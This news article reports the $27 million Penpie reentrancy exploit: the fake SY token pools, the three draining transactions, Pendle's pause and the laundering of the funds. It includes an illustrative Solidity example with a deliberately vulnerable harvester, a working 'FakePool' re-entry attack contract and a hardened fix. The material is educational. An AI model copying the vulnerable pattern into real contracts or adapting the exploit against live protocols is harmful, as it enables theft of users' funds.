Penpie exploited for $27 million in reentrancy attack

  • September 23, 2024
Gino Matos · 3 weeks ago · 2 minute read

The exploiter deployed malicious smart contracts and fake tokens posing as legitimate liquidity pools to fool Penpie's contract.

Updated: Sep. 4, 2024 at 9:09 pm UTC

Cover art/illustration via CryptoSlate. Image includes combined content which may include AI-generated content.

Yield protocol Penpie was exploited for $27 million on Sept. 3 after a malicious actor exploited a vulnerability in the protocol's smart contracts.

Penpie is a yield protocol built on Pendle that aims to boost rewards for users on the network.

Reentrancy exploited

In a Sept. 4 breakdown, blockchain security firm Hacken explained that the attacker used a pool with fake tokens to carry out the heist. The exploiter created worthless versions of Pendle's yield-bearing tokens, Standardized Yield (SY), and linked them to valuable assets.

The attacker deployed five malicious contracts to pose as legitimate liquidity pools and trick Penpie's rewards system, but only three of them were used. He then leveraged the fake SY tokens as tickets to claim real yield.

Three attack transactions were executed between 6:25 P.M. and 6:42 P.M. UTC. The first transaction extracted the largest amount, siphoning $15.7 million, followed by two other transactions that drained $5.6 million each from Penpie's contract.

The exploiter made off with 695 Restaked Swell ETH (rswETH), 4,101 Kelp Gain (agETH), 2,723 Wrapped Staked ETH (wstETH), and 2.52 million Staked Ethena USD (sUSDe).

The remaining two malicious contracts deployed by the exploiter were not used in the attack, which was made possible by a reentrancy vulnerability in Penpie's contract.

A reentrancy vulnerability occurs when a contract makes an external call to another smart contract before updating its own state. The called contract can then re-enter the caller while its bookkeeping is still stale, manipulating data and injecting actions the caller did not expect. The standard defenses are to finish all state updates before any external call (the checks-effects-interactions pattern), to put a reentrancy guard on every state-changing entry point, and to never call contracts the protocol has not vetted.
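The pattern described above, as an added illustration in Solidity. This is not Penpie's or Pendle's code; the contract names (VulnerableHarvester, FakePool, HardenedHarvester) and the IPool interface are invented for the example. The vulnerable harvester calls an attacker-supplied "pool" between taking a balance snapshot and booking rewards from it, so a re-entrant deposit made during that call is credited as yield. The hardened version adds a reentrancy guard, a pool allowlist, and effects-before-interactions in withdrawal.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
// Illustrative example only; contract names are assumed, not Penpie's code.

interface IERC20 {
    function balanceOf(address owner) external view returns (uint256);
    function transfer(address to, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
    function approve(address spender, uint256 amount) external returns (bool);
}

// Whatever the harvester is pointed at; attacker-controlled in the fake-pool scenario.
interface IPool {
    function redeemRewards(address to) external;
}

contract VulnerableHarvester {
    IERC20 public immutable token;
    mapping(address => uint256) public deposits;     // principal per user
    mapping(address => uint256) public rewardCredit; // harvested rewards owed per user

    constructor(IERC20 _token) { token = _token; }

    function deposit(uint256 amount) external {
        token.transferFrom(msg.sender, address(this), amount);
        deposits[msg.sender] += amount;
    }

    // BUG: an untrusted external call sits between the balance snapshot and the
    // accounting that depends on it. Any tokens that arrive during the call,
    // including a re-entrant deposit(), are booked as "rewards" for msg.sender.
    function harvest(IPool pool) external {
        uint256 before = token.balanceOf(address(this));
        pool.redeemRewards(address(this));            // external call first...
        uint256 gained = token.balanceOf(address(this)) - before;
        rewardCredit[msg.sender] += gained;           // ...state update afterwards
    }

    function withdrawAll() external {
        uint256 amount = deposits[msg.sender] + rewardCredit[msg.sender];
        deposits[msg.sender] = 0;
        rewardCredit[msg.sender] = 0;
        token.transfer(msg.sender, amount);
    }
}

// Attacker's "pool": its only job is to re-enter the harvester mid-harvest.
contract FakePool is IPool {
    VulnerableHarvester public immutable target;
    IERC20 public immutable token;

    constructor(VulnerableHarvester _target, IERC20 _token) { target = _target; token = _token; }

    // Invoked by VulnerableHarvester.harvest() while its balance snapshot is stale.
    function redeemRewards(address) external override {
        uint256 amount = token.balanceOf(address(this));
        token.approve(address(target), amount);
        target.deposit(amount);   // re-entrant: raises the harvester's balance by `amount`
    }

    // Fund this contract with X tokens first. After attack() it holds 2X:
    // X returned as principal plus X booked as "rewards" it never earned.
    function attack() external {
        target.harvest(IPool(address(this)));
        target.withdrawAll();
    }
}

contract HardenedHarvester {
    IERC20 public immutable token;
    address public immutable owner;
    mapping(address => bool) public allowedPool;
    mapping(address => uint256) public deposits;
    mapping(address => uint256) public rewardCredit;
    uint256 private locked = 1;

    // Fix 1: one guard shared by every state-changing entry point, so a callback
    // from harvest() cannot re-enter deposit() or withdrawAll().
    modifier nonReentrant() {
        require(locked == 1, "reentrant call");
        locked = 2;
        _;
        locked = 1;
    }

    constructor(IERC20 _token) { token = _token; owner = msg.sender; }

    // Fix 2: only vetted pools can be harvested; a fake SY pool is never called at all.
    function setAllowedPool(address pool, bool ok) external {
        require(msg.sender == owner, "not owner");
        allowedPool[pool] = ok;
    }

    function deposit(uint256 amount) external nonReentrant {
        token.transferFrom(msg.sender, address(this), amount);
        deposits[msg.sender] += amount;
    }

    function harvest(IPool pool) external nonReentrant {
        require(allowedPool[address(pool)], "pool not allowed");
        uint256 before = token.balanceOf(address(this));
        pool.redeemRewards(address(this));
        rewardCredit[msg.sender] += token.balanceOf(address(this)) - before;
    }

    function withdrawAll() external nonReentrant {
        uint256 amount = deposits[msg.sender] + rewardCredit[msg.sender];
        deposits[msg.sender] = 0;           // effects before the interaction
        rewardCredit[msg.sender] = 0;
        token.transfer(msg.sender, amount);
    }
}
```

Against HardenedHarvester the same FakePool fails twice over: harvest() reverts on the allowlist check, and even if the pool were allowed, the re-entrant deposit() reverts with "reentrant call" because the guard is held for the whole harvest. The balance-delta accounting itself is only safe once nothing untrusted can move tokens into the contract while the snapshot is live.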

Notably, the losses could have been larger. Pendle identified the malicious transactions and paused its contracts at 6:45 P.M. UTC, three minutes after the third attack. Hacken highlighted:

“This was crucial, as the attacker deployed a fourth malicious contract just a minute later. Pausing Pendle’s contracts effectively halted the exploit, preventing further loss.”

The entire batch of tokens was converted to Ethereum (ETH), amounting to roughly 10,113 ETH. The exploiter moved 3,000 ETH to the mixer service Tornado Cash and currently holds 7,113.27 ETH, according to on-chain data.

The Penpie team reached out to the exploiter via an on-chain message and an X post acknowledging the hack and stating that it is open to negotiating a bounty in exchange for the stolen funds. They promised that no legal action would be pursued.
